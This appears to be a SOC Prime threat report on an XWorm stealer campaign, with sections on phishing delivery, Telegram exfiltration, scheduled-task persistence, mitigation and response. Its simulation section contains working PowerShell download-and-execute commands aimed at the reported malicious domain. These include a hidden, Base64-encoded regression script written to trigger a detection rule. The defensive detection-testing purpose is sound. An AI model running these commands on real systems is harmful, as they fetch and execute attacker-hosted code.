SOC Prime Bias: Medium

06 Feb 2026 15:26 UTC

Malicious Script Delivering More Maliciousness

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
Malicious Script Delivering More Maliciousness
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

A phishing email delivers a malicious attachment containing a BAT script that launches PowerShell to pull down a Base64-encoded payload. After decoding, the payload resolves to XWorm, a .NET stealer that fingerprints the host and exfiltrates collected data through a Telegram bot. Persistence is established by creating a scheduled task that repeatedly runs the dropped executable. The operation relies on multiple infrastructure elements, including a fake image-hosting lure and at least one compromised IP used for payload staging.

Investigation

Review of the BAT script exposed a PowerShell one-liner that retrieves a PNG-looking file from an attacker-controlled domain. The embedded Base64 content is then sanitized, reversed, and decoded to reconstruct the .NET executable. Binary analysis showed the malware registers a scheduled task named Chromiumx2 and uses Telegram’s API for command-and-control and data exfiltration. Investigators extracted key network indicators, including the hosting domain, associated IP address, and the Telegram API endpoint referenced during execution.

Mitigation

Prevent execution of untrusted BAT and PowerShell content originating from email attachments or user download directories. Apply application allow-listing to restrict scheduled task creation and flag suspicious new task registrations. Monitor and, where feasible, restrict outbound access to Telegram API endpoints and block the identified malicious domains at DNS/proxy layers. Keep endpoint detections updated with newly observed indicators and script-based download patterns.

Response

Isolate endpoints where the Chromiumx2 scheduled task or Chromiumx2.exe is observed. Remove the scheduled task, delete the malicious binary, and collect artifacts (script, decoded payload, task XML, and relevant logs) for forensic scoping. Hunt across the environment for the same task name, similar PowerShell decode behavior, and Telegram-driven traffic. Reset potentially exposed credentials and notify users about the phishing attachment to reduce repeat execution.

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

  • Attack Narrative & Commands:
    The attacker wants to download and execute a malicious payload from a compromised web server. To evade classic signature detection, they embed the entire download‑and‑execute logic in a single Base64 string and invoke PowerShell with -EncodedCommand. The command references the exact URL that the detection rule monitors (https://uniworldrivercruises-co.uk/optimized_MSI.png).

    1. Encode the malicious payload (a simple downloader that runs the received script):

      $payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')"
      $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
      Write-Host $b64

      Resulting B64 (example): SQBFAFgAIABpAG4AIABOAGUAdwAtAE8AbgB0AGkAYwBzACA... (truncated).

    2. Execute the encoded command:

      powershell -EncodedCommand SQBFAFgAIABpAG4AIABOAGUAdwAtAE8AbgB0AGkAYwBzACA...

    This single line generates the exact telemetry the Sigma rule expects: a PowerShell process, the -EncodedCommand flag, and the malicious URL inside the decoded script block.

  • Regression Test Script:

    #-------------------------------------------------
    # Regression script to trigger the detection rule
    #-------------------------------------------------
    # 1. Build the malicious payload
    $payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')"
    $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
    
    # 2. Execute the payload via an encoded PowerShell command
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $b64" `
        -WindowStyle Hidden -PassThru | Out-Null
    
    Write-Host "Malicious encoded command executed."
    #-------------------------------------------------
  • Cleanup Commands:

    # Remove any transient files (none expected because the payload streams directly)
    # Terminate any lingering hidden PowerShell processes started by the test
    Get-Process -Name "powershell" -ErrorAction SilentlyContinue |
        Where-Object {$_.StartInfo.Arguments -match "-EncodedCommand"} |
        Stop-Process -Force
    
    Write-Host "Cleanup complete."